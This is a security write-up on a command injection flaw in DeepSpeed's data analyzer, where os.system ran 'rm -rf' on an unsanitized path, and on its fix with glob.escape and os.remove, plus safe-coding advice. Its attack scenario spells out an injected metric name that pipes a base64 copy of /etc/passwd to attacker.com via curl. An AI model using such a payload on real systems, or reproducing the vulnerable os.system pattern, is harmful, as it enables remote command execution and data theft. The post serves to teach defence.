Critical severity · 9 min read

Command Injection via os.system() in DeepSpeed's Data Analyzer: A Critical Fix

A critical command injection vulnerability was discovered in DeepSpeed's `data_analyzer.py`, where an `os.system()` call directly interpolated an unsanitized file path variable into a shell command string. An attacker who could influence dataset configuration or file paths could execute arbitrary shell commands on the host machine. The fix replaces the dangerous shell invocation with safe, Python-native file operations that never touch a shell interpreter.

By orbisai0security
May 28, 2026


Introduction

Machine learning infrastructure is not immune to classic security vulnerabilities. In fact, as ML frameworks grow in complexity and adoption, they become increasingly attractive targets — and increasingly likely to carry the same security pitfalls found in any large software project. This post examines a critical command injection vulnerability discovered and patched in DeepSpeed, Microsoft's popular deep learning optimization library used by organizations training large-scale models worldwide.

The vulnerability lived in a single line of Python code. One call to os.system(). One unsanitized variable. And the potential for full arbitrary command execution on any machine running the affected data pipeline.

If you write Python code that touches the filesystem, spawns subprocesses, or processes user-supplied paths — this one is for you.


The Vulnerability Explained

What Went Wrong

Inside deepspeed/runtime/data_pipeline/data_sampling/data_analyzer.py, the init_metric_results method needed to clean up old metric files before creating new ones. The original implementation did this:

# VULNERABLE CODE — DO NOT USE
metric_to_sample_fname = f"{metric_save_path}/{metric_name}_metric_to_sample"
os.system(f"rm -rf {metric_to_sample_fname}*")

At first glance, this looks like a harmless cleanup routine. But there are two deeply problematic choices here working together:

  1. os.system() invokes a shell interpreter (/bin/sh on Unix). This means the entire string is passed to the shell, which will happily interpret metacharacters like ;, |, &&, `, $(), and &.

  2. metric_to_sample_fname is derived from user-supplied input — specifically from dataset configuration values or file paths provided at runtime. There is no sanitization, escaping, or validation of this value before it is embedded in the shell command string.

How Could It Be Exploited?

The attack surface opens wherever a user or an external system can influence the metric_save_path or metric_name values passed into the data pipeline. In practice, these values often come from:

  • Dataset configuration files (YAML/JSON)
  • Command-line arguments
  • Programmatic API calls from orchestration systems
  • Shared storage paths in multi-tenant training environments

An attacker who controls either of these values can craft a payload that breaks out of the intended rm -rf command and executes arbitrary shell instructions.

Attack Scenario

Imagine a multi-tenant ML platform where users submit training jobs with their own dataset configurations. A malicious user submits the following as their metric_name:

foo; curl http://attacker.com/exfil?data=$(cat /etc/passwd | base64); echo bar

With metric_save_path set to /data/metrics, the resulting shell command becomes:

rm -rf /data/metrics/foo; curl http://attacker.com/exfil?data=$(cat /etc/passwd | base64); echo bar_metric_to_sample*
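The string-building step can be reproduced in isolation to confirm the command above. This sketch assumes metric_save_path is /data/metrics, as in the scenario, and it only builds and prints the string; nothing is executed. Splitting on ";" is a naive illustration of how the shell separates commands, not a real shell parser.

```python
# Reproduces only the string-building step of the vulnerable code; nothing runs.
metric_save_path = "/data/metrics"  # assumed value, as in the scenario
metric_name = "foo; curl http://attacker.com/exfil?data=$(cat /etc/passwd | base64); echo bar"

metric_to_sample_fname = f"{metric_save_path}/{metric_name}_metric_to_sample"
command = f"rm -rf {metric_to_sample_fname}*"
print(command)

# Naive split on ";" (a real shell also handles quoting), one command per segment
segments = [segment.strip() for segment in command.split(";")]
for segment in segments:
    print(segment)
```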

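The shell runs all three commands in sequence:
1. 🚨 rm -rf /data/metrics/foo deletes whatever exists at that path, not the intended metric files
2. 🚨 curl attempts to send a base64-encoded copy of /etc/passwd to an attacker-controlled server
3. ✅ echo bar_metric_to_sample* only prints text; it absorbs the leftover _metric_to_sample* suffix so it does not trigger an error

Replacing the curl segment with any other command gives the attacker arbitrary execution.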

In a cloud training environment, this could mean:
- Credential theft — reading cloud provider credentials from ~/.aws/credentials or instance metadata endpoints
- Data exfiltration — stealing training datasets, model weights, or proprietary code
- Lateral movement — using the compromised node as a pivot point into internal networks
- Denial of service — destroying training checkpoints or corrupting datasets

Even without a fully adversarial scenario, an accidentally malformed path containing spaces or special characters could cause silent failures or unintended file deletions, and because the command is rm -rf, any such mistake is potentially catastrophic.

Why os.system() Is Dangerous

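The Python documentation recommends the subprocess module over os.system(), and the subprocess security notes warn that whenever a shell is invoked, the application is responsible for quoting whitespace and metacharacters to avoid shell injection. On POSIX systems, passing a string to os.system() essentially does this: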

/bin/sh -c "<your string here>"

The shell is a powerful interpreter. Its job is to find and execute commands, expand variables, and evaluate expressions. That power is exactly what makes it dangerous when you feed it untrusted data.
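The effect is easy to observe by handing strings to /bin/sh -c, which is what os.system() does on POSIX. This is a minimal sketch that assumes a POSIX system with /bin/sh; it calls the shell through subprocess only so the output can be captured, and run_like_os_system is a hypothetical helper name.

```python
import subprocess


def run_like_os_system(cmd: str) -> str:
    # os.system(cmd) on POSIX hands cmd to "/bin/sh -c"; do the same explicitly
    # so that stdout can be captured and inspected.
    result = subprocess.run(["/bin/sh", "-c", cmd], capture_output=True, text=True, check=True)
    return result.stdout


# ";" separates commands: one string, two commands
two_commands = run_like_os_system("echo first; echo second")

# Unquoted spaces split words: the shell sees two arguments, not one path
arg_count = run_like_os_system('set -- /data/my metrics; echo "$#"')

print(two_commands, end="")  # first / second on separate lines
print(arg_count, end="")     # 2
```

The second call is the "accidental" case from above: a path with a space silently becomes two separate arguments.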

This vulnerability class is well-documented:
- CWE-78: Improper Neutralization of Special Elements used in an OS Command ("OS Command Injection")
- OWASP A03:2021: Injection
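- CVSS: scores for this class often fall in the Critical range (9.0+) when untrusted input reaches os.system() without sanitization, though the actual score depends on factors such as attack vector and required privileges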


The Fix

What Changed

The fix is elegant in its simplicity: eliminate the shell entirely. Instead of asking a shell to delete files, use Python's own filesystem APIs, which operate directly on file paths without any shell interpretation.

Before (Vulnerable):

metric_to_sample_fname = f"{metric_save_path}/{metric_name}_metric_to_sample"
os.system(f"rm -rf {metric_to_sample_fname}*")

After (Fixed):

import glob

metric_to_sample_fname = f"{metric_save_path}/{metric_name}_metric_to_sample"
for _f in glob.glob(f"{glob.escape(metric_to_sample_fname)}*"):
    os.remove(_f)

Why This Fix Works

Let's break down each component of the fix:

1. glob.escape() — Neutralizing Special Characters

glob.escape(metric_to_sample_fname)

glob.escape() escapes the special glob characters *, ?, and [ in the input string (a ] only has meaning after an unescaped [, so it needs no escaping). This ensures that if metric_to_sample_fname contains characters that glob would normally treat as wildcards or character classes, they are matched literally instead.

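This prevents a crafted name from widening the set of files the pattern matches, a check that was entirely absent in the original code. Note that glob.escape() deals only with glob wildcards; the protection against command injection comes from removing the shell altogether.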
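The difference glob.escape() makes shows up with two files whose names differ only by literal brackets. A minimal sketch in a temporary directory; the file names are hypothetical.

```python
import glob
import os
import tempfile

with tempfile.TemporaryDirectory() as tmp:
    # Two files whose names differ only by literal brackets
    for name in ("exp[1]_metric_to_sample_0", "exp1_metric_to_sample_0"):
        open(os.path.join(tmp, name), "w").close()

    prefix = os.path.join(tmp, "exp[1]_metric_to_sample")

    # Unescaped: "[1]" is a character class, so it matches "exp1_..." instead
    raw = sorted(os.path.basename(p) for p in glob.glob(prefix + "*"))

    # Escaped: brackets are literal, so only the intended file matches
    safe = sorted(os.path.basename(p) for p in glob.glob(glob.escape(prefix) + "*"))

print(raw)                         # ['exp1_metric_to_sample_0']
print(safe)                        # ['exp[1]_metric_to_sample_0']
print(glob.escape("run[1]*?"))     # run[[]1][*][?]
```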

2. glob.glob() — Safe Pattern Expansion

glob.glob(f"{glob.escape(metric_to_sample_fname)}*")

The glob.glob() function expands the file pattern and returns a list of matching file paths. Critically:
- It never invokes a shell
- It operates purely in Python's filesystem layer
- It returns concrete matching file paths, and nothing interprets them further

The trailing * (outside the escaped portion) is intentional: it matches files like metric_to_sample_0, metric_to_sample_1, etc., which is the original intent of the cleanup.

3. os.remove() — Direct File Deletion

os.remove(_f)

os.remove() deletes a single file by path. It makes a direct syscall — no shell, no string interpolation, no command parsing. Each file returned by glob.glob() is deleted individually and safely.
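Putting the three pieces together, the patched logic can be exercised end to end. This is a sketch: remove_metric_to_sample_files is a hypothetical wrapper around the fixed lines (not a DeepSpeed function), and the metric file names are made up for the demo.

```python
import glob
import os
import tempfile


def remove_metric_to_sample_files(metric_save_path: str, metric_name: str) -> list[str]:
    """Hypothetical wrapper around the patched cleanup; returns removed file names."""
    metric_to_sample_fname = f"{metric_save_path}/{metric_name}_metric_to_sample"
    removed = []
    # Escape the literal prefix, then append an unescaped "*" wildcard
    for _f in glob.glob(f"{glob.escape(metric_to_sample_fname)}*"):
        os.remove(_f)  # deletes one file directly; no shell is started
        removed.append(os.path.basename(_f))
    return sorted(removed)


with tempfile.TemporaryDirectory() as tmp:
    # Hypothetical metric files for a metric called "loss"
    for name in ("loss_metric_to_sample_0", "loss_metric_to_sample_1", "loss_sample_to_metric"):
        open(os.path.join(tmp, name), "w").close()

    # Normal use: only files starting with "loss_metric_to_sample" are removed
    normal = remove_metric_to_sample_files(tmp, "loss")

    # Hostile name: just a literal prefix that matches nothing, so no command runs
    hostile = remove_metric_to_sample_files(tmp, "x; touch pwned")

    remaining = sorted(os.listdir(tmp))

print(normal)     # ['loss_metric_to_sample_0', 'loss_metric_to_sample_1']
print(hostile)    # []
print(remaining)  # ['loss_sample_to_metric']
```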

The Security Improvement at a Glance

| Property | Before (os.system) | After (glob + os.remove) |
|---|---|---|
| Shell invoked? | ✅ Yes | ❌ No |
| Input sanitized? | ❌ No | ✅ Yes (glob.escape) |
| Metachar risk? | 🚨 Critical | ✅ None |
| Behavior on bad input | Arbitrary execution | Safe failure / no match |
| Intent preserved? | ✅ Yes | ✅ Yes |

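The fix preserves the intended behavior: the code still cleans up old metric files, but no shell is involved, so there is nothing to inject into. One subtle difference: rm -rf also deleted matching directories and the original code ignored its exit status, whereas os.remove() deletes only files and raises an OSError if a match is a directory. For the regular metric files this routine targets, the outcome is the same.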


Prevention & Best Practices

This vulnerability follows a pattern that appears regularly in Python codebases. Here's how to prevent it and detect it in your own projects.

1. Never Use os.system() with Variable Input

The rule is simple: if the string passed to os.system() contains any variable, it is potentially dangerous. Even variables you believe are safe can be influenced by upstream inputs you haven't considered.

# ❌ Always dangerous
os.system(f"rm -rf {some_path}*")
os.system("ls " + user_input)

# ✅ Use Python's filesystem APIs instead
import glob
import os
for f in glob.glob(f"{glob.escape(some_path)}*"):
    os.remove(f)

2. Prefer subprocess with List Arguments When You Must Spawn Processes

If you genuinely need to run an external command, use subprocess with a list of arguments (not a shell string) and shell=False (the default):

import subprocess

# ❌ Still vulnerable — shell=True defeats the purpose
subprocess.run(f"rm -rf {path}*", shell=True)

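# ✅ Safe: no shell; "--" ends option parsing so a path starting with "-" is not read as a flag
subprocess.run(["rm", "-rf", "--", path], shell=False)

When arguments are passed as a list, subprocess hands them directly to the operating system's exec call (execve on POSIX). The shell is never involved, so metacharacters are never interpreted. Two caveats follow: without a shell, a trailing * is not expanded, so wildcard matching has to happen in Python (for example with glob); and the target program still parses its own options, which is why the -- separator matters when a path could start with -.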
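To see that list arguments reach the child program verbatim, the sketch below launches a tiny Python child (via sys.executable, so no extra tools are assumed) that prints the argv it received. The hostile strings are illustrative.

```python
import subprocess
import sys

hostile = ["foo; echo pwned", "$(id)", "*"]

# Child process: a one-line Python program that prints the arguments it received.
# No shell sits in between, so ";", "$(...)" and "*" arrive as plain text.
result = subprocess.run(
    [sys.executable, "-c", "import sys; print(sys.argv[1:])", *hostile],
    capture_output=True,
    text=True,
    check=True,
)
print(result.stdout, end="")  # ['foo; echo pwned', '$(id)', '*']
```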

3. Use glob.escape() Whenever Building Glob Patterns from External Input

import glob

# ❌ User input could contain *, ?, [, ]
pattern = f"{user_supplied_path}/*.log"

# ✅ Escape the user-supplied portion
pattern = f"{glob.escape(user_supplied_path)}/*.log"

4. Prefer Python-Native APIs Over Shell Commands

For common filesystem operations, Python's standard library has you covered without ever needing a shell:

| Shell Command | Python Equivalent |
|---|---|
| rm -rf path | shutil.rmtree(path) |
| rm file | os.remove(file) |
| rm file* | glob.glob() + os.remove() |
| cp src dst | shutil.copy2(src, dst) |
| mv src dst | shutil.move(src, dst) |
| mkdir -p path | os.makedirs(path, exist_ok=True) |
| ls path | os.listdir(path) |
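A short sketch exercising several rows of this table inside a throwaway directory; the directory layout and file names are hypothetical, and each call is annotated with the shell command it replaces.

```python
import glob
import os
import shutil
import tempfile

with tempfile.TemporaryDirectory() as tmp:
    work = os.path.join(tmp, "run", "metrics")
    os.makedirs(work, exist_ok=True)                                 # mkdir -p

    src = os.path.join(work, "a_metric_to_sample_0")
    with open(src, "w") as fh:
        fh.write("data")
    shutil.copy2(src, os.path.join(work, "a_metric_to_sample_1"))   # cp
    shutil.move(os.path.join(work, "a_metric_to_sample_1"),
                os.path.join(work, "b_metric_to_sample_1"))         # mv
    listing = sorted(os.listdir(work))                               # ls

    for f in glob.glob(glob.escape(os.path.join(work, "a_")) + "*"):  # rm a_*
        os.remove(f)
    after_rm = sorted(os.listdir(work))

    shutil.rmtree(os.path.join(tmp, "run"))                          # rm -rf
    gone = not os.path.exists(os.path.join(tmp, "run"))

print(listing)   # ['a_metric_to_sample_0', 'b_metric_to_sample_1']
print(after_rm)  # ['b_metric_to_sample_1']
print(gone)      # True
```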

5. Validate and Sanitize File Paths

When file paths originate from user input, configuration files, or external systems, validate them before use:

import os
import re

# Allow only alphanumeric characters, hyphens, and underscores
_METRIC_NAME_RE = re.compile(r"[a-zA-Z0-9_\-]+")

def safe_metric_path(base_dir: str, metric_name: str) -> str:
    # fullmatch() requires every character of the name to be allowed
    if not _METRIC_NAME_RE.fullmatch(metric_name):
        raise ValueError(f"Invalid metric name: {metric_name!r}")

    # Resolve both paths and confirm the result stays within base_dir,
    # comparing whole path components rather than a string prefix
    base = os.path.realpath(base_dir)
    full_path = os.path.realpath(os.path.join(base, metric_name))
    if os.path.commonpath([base, full_path]) != base:
        raise ValueError("Path traversal detected")

    return full_path
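Two details of path validation are easy to get wrong: with re.match(), a $ anchor also accepts a trailing newline, and a plain startswith() prefix test is fooled by a sibling directory that shares the prefix. A small sketch of both pitfalls; the paths are hypothetical.

```python
import os
import re

# Pitfall 1: with re.match(), "$" also matches just before a trailing newline
loose = re.match(r"^[a-zA-Z0-9_\-]+$", "loss\n") is not None
strict = re.fullmatch(r"[a-zA-Z0-9_\-]+", "loss\n") is not None

# Pitfall 2: a string prefix test accepts a sibling directory
base = "/data/metrics"
candidate = "/data/metrics_evil/loss"
prefix_ok = candidate.startswith(base)
component_ok = os.path.commonpath([base, candidate]) == base

print(loose, strict)            # True False
print(prefix_ok, component_ok)  # True False
```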

6. Static Analysis Tools

Several tools can automatically detect os.system() calls and other dangerous patterns in Python code:

  • Bandit — Python-specific security linter. The B605 rule flags os.system() calls directly.
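    Run it with the shell-related checks selected (B607 additionally flags processes started with a partial executable path):
    bandit -r your_project/ -t B605,B607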
  • Semgrep — Powerful pattern-matching tool with rules for command injection.
  • CodeQL — GitHub's semantic code analysis engine with taint-tracking for injection vulnerabilities.
  • OrbisAI Security — AI-powered scanner that detected this exact vulnerability automatically.

Adding these tools to your CI/CD pipeline means vulnerabilities like this one are caught before they ever reach production.
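To give a feel for what such rules look for, here is a toy checker built on Python's standard ast module. It is an illustrative sketch only, not how Bandit, Semgrep, or CodeQL are implemented: it catches just the literal spellings os.system(...) and shell=True, with no taint tracking. find_shell_calls is a hypothetical name.

```python
import ast

SOURCE = '''
import os
os.system(f"rm -rf {path}*")
subprocess.run(cmd, shell=True)
subprocess.run(["rm", "--", path])
'''


def find_shell_calls(source: str) -> list[tuple[int, str]]:
    """Flag os.system(...) calls and any call passing shell=True (a toy check)."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        # Matches the attribute call os.system(...)
        if (isinstance(func, ast.Attribute) and func.attr == "system"
                and isinstance(func.value, ast.Name) and func.value.id == "os"):
            findings.append((node.lineno, "os.system"))
        # Matches any call with a literal shell=True keyword
        for kw in node.keywords:
            if kw.arg == "shell" and isinstance(kw.value, ast.Constant) and kw.value.value is True:
                findings.append((node.lineno, "shell=True"))
    return sorted(findings)


findings = find_shell_calls(SOURCE)
print(findings)  # [(3, 'os.system'), (4, 'shell=True')]
```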

7. Security Standards References


Conclusion

A single call to os.system() with an unsanitized variable is all it takes to turn a routine file cleanup into a critical security vulnerability. The lesson here isn't that the original developer was careless — it's that certain APIs are inherently dangerous when combined with variable input, and developers need to internalize which APIs those are.

The fix demonstrates something important: the most secure code is often the simplest code. Replacing a shell command with native Python filesystem operations didn't require complex cryptography, elaborate input validation, or architectural changes. It required recognizing that the shell was never necessary in the first place, and removing it entirely.

Key takeaways:

  • 🚫 Avoid os.system() — it invokes a shell, and shells interpret metacharacters
  • Use Python-native filesystem APIs (os.remove(), shutil, pathlib) for file operations
  • 🔒 Use glob.escape() when building glob patterns from external input
  • 🔍 Run Bandit or Semgrep in your CI pipeline to catch these patterns automatically
  • 📋 Treat all external input as untrusted — including configuration files and dataset paths

Security vulnerabilities in ML infrastructure carry the same risks as vulnerabilities anywhere else — and sometimes higher, given the sensitive datasets and credentials that training environments typically handle. Secure coding practices aren't just for web applications. They belong in every line of code you ship.


This vulnerability was automatically detected and patched by OrbisAI Security. Automated security scanning helps catch issues like this before they reach production.

View the Security Fix

The pull request that fixed this vulnerability: PR #7994
